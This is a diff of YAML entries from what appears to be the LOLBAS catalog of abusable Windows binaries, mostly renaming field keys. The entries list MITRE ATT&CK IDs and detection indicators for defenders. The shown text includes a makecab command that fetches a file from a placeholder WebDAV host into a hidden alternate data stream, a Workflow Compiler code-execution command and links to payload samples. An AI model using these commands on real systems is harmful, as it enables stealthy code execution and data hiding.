MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Expand.exe
|
- Path: C:\Windows\System32\Expand.exe
|
||||||
- Path: C:\Windows\SysWOW64\Expand.exe
|
- Path: C:\Windows\SysWOW64\Expand.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
||||||
- Path: C:\Program Files\Internet Explorer(x86)\Extexport.exe
|
- Path: C:\Program Files\Internet Explorer(x86)\Extexport.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Extexport.exe loads dll and is execute from other folder the original path
|
- IOC: Extexport.exe loads dll and is execute from other folder the original path
|
||||||
|
@ -28,10 +28,10 @@ Commands:
|
|||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\extrac32.exe
|
- Path: C:\Windows\System32\extrac32.exe
|
||||||
- Path: C:\Windows\SysWOW64\extrac32.exe
|
- Path: C:\Windows\SysWOW64\extrac32.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -36,10 +36,10 @@ Commands:
|
|||||||
MitreID: T1185
|
MitreID: T1185
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1185
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1185
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\findstr.exe
|
- Path: C:\Windows\System32\findstr.exe
|
||||||
- Path: C:\Windows\SysWOW64\findstr.exe
|
- Path: C:\Windows\SysWOW64\findstr.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: finstr.exe should normally not be invoked on a client system
|
- IOC: finstr.exe should normally not be invoked on a client system
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\forfiles.exe
|
- Path: C:\Windows\System32\forfiles.exe
|
||||||
- Path: C:\Windows\SysWOW64\forfiles.exe
|
- Path: C:\Windows\SysWOW64\forfiles.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\gpscript.exe
|
- Path: C:\Windows\System32\gpscript.exe
|
||||||
- Path: C:\Windows\SysWOW64\gpscript.exe
|
- Path: C:\Windows\SysWOW64\gpscript.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Scripts added in local group policy
|
- IOC: Scripts added in local group policy
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\hh.exe
|
- Path: C:\Windows\System32\hh.exe
|
||||||
- Path: C:\Windows\SysWOW64\hh.exe
|
- Path: C:\Windows\SysWOW64\hh.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: hh.exe should normally not be in use on a normal workstation
|
- IOC: hh.exe should normally not be in use on a normal workstation
|
||||||
|
@ -12,12 +12,12 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\ie4unit.exe
|
- Path: c:\windows\system32\ie4unit.exe
|
||||||
- Path: c:\windows\sysWOW64\ie4unit.exe
|
- Path: c:\windows\sysWOW64\ie4unit.exe
|
||||||
- Path: c:\windows\system32\ieuinit.inf
|
- Path: c:\windows\system32\ieuinit.inf
|
||||||
- Path: c:\windows\sysWOW64\ieuinit.inf
|
- Path: c:\windows\sysWOW64\ieuinit.inf
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: ie4unit.exe loading a inf file from outside %windir%
|
- IOC: ie4unit.exe loading a inf file from outside %windir%
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
||||||
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -20,12 +20,12 @@ Commands:
|
|||||||
MitreID: T1118
|
MitreID: T1118
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1118
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1118
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -15,7 +15,7 @@ Commands:
|
|||||||
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
|
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
|
||||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||||
Usecase: Hide data compressed into an alternate data stream
|
Usecase: Hide data compressed into an alternate data stream
|
||||||
Category: Alternate data streams
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
@ -28,10 +28,10 @@ Commands:
|
|||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\makecab.exe
|
- Path: C:\Windows\System32\makecab.exe
|
||||||
- Path: C:\Windows\SysWOW64\makecab.exe
|
- Path: C:\Windows\SysWOW64\makecab.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Makecab getting files from Internet
|
- IOC: Makecab getting files from Internet
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mavinject.exe
|
- Path: C:\Windows\System32\mavinject.exe
|
||||||
- Path: C:\Windows\SysWOW64\mavinject.exe
|
- Path: C:\Windows\SysWOW64\mavinject.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
||||||
|
@ -7,7 +7,7 @@ Commands:
|
|||||||
- Command: Microsoft.Worflow.Compiler.exe tests.xml results.xml
|
- Command: Microsoft.Worflow.Compiler.exe tests.xml results.xml
|
||||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
||||||
Usecase: Compile and run code
|
Usecase: Compile and run code
|
||||||
Category: Execution
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||||
@ -28,9 +28,9 @@ Commands:
|
|||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||||
OperatingSystem: Windows 10S
|
OperatingSystem: Windows 10S
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows 10 (and possibly earlier versions)
|
OperatingSystem: Windows 10 (and possibly earlier versions)
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mmc.exe
|
- Path: C:\Windows\System32\mmc.exe
|
||||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -20,14 +20,14 @@ Commands:
|
|||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||||
|
@ -12,9 +12,9 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\msconfig.exe
|
- Path: C:\Windows\System32\msconfig.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: mscfgtlc.xml changes in system32 folder
|
- IOC: mscfgtlc.xml changes in system32 folder
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Msdt.exe
|
- Path: C:\Windows\System32\Msdt.exe
|
||||||
- Path: C:\Windows\SysWOW64\Msdt.exe
|
- Path: C:\Windows\SysWOW64\Msdt.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -36,10 +36,10 @@ Commands:
|
|||||||
MitreID: T1170
|
MitreID: T1170
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mshta.exe
|
- Path: C:\Windows\System32\mshta.exe
|
||||||
- Path: C:\Windows\SysWOW64\mshta.exe
|
- Path: C:\Windows\SysWOW64\mshta.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
||||||
|
@ -36,10 +36,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\msiexec.exe
|
- Path: C:\Windows\System32\msiexec.exe
|
||||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: msiexec.exe getting files from Internet
|
- IOC: msiexec.exe getting files from Internet
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\odbcconf.exe
|
- Path: C:\Windows\System32\odbcconf.exe
|
||||||
- Path: C:\Windows\SysWOW64\odbcconf.exe
|
- Path: C:\Windows\SysWOW64\odbcconf.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -28,9 +28,9 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\pcalua.exe
|
- Path: C:\Windows\System32\pcalua.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -12,9 +12,9 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\pcwrun.exe
|
- Path: C:\Windows\System32\pcwrun.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Presentationhost.exe
|
- Path: C:\Windows\System32\Presentationhost.exe
|
||||||
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -28,10 +28,10 @@ Commands:
|
|||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\print.exe
|
- Path: C:\Windows\System32\print.exe
|
||||||
- Path: C:\Windows\SysWOW64\print.exe
|
- Path: C:\Windows\SysWOW64\print.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Print.exe getting files from internet
|
- IOC: Print.exe getting files from internet
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\reg.exe
|
- Path: C:\Windows\System32\reg.exe
|
||||||
- Path: C:\Windows\SysWOW64\reg.exe
|
- Path: C:\Windows\SysWOW64\reg.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: reg.exe writing to an ADS
|
- IOC: reg.exe writing to an ADS
|
||||||
|
@ -20,12 +20,12 @@ Commands:
|
|||||||
MitreID: T1121
|
MitreID: T1121
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: regasm.exe executing dll file
|
- IOC: regasm.exe executing dll file
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regedit.exe
|
- Path: C:\Windows\System32\regedit.exe
|
||||||
- Path: C:\Windows\SysWOW64\regedit.exe
|
- Path: C:\Windows\SysWOW64\regedit.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: regedit.exe reading and writing to alternate data stream
|
- IOC: regedit.exe reading and writing to alternate data stream
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Register-cimprovider.exe
|
- Path: C:\Windows\System32\Register-cimprovider.exe
|
||||||
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1121
|
MitreID: T1121
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
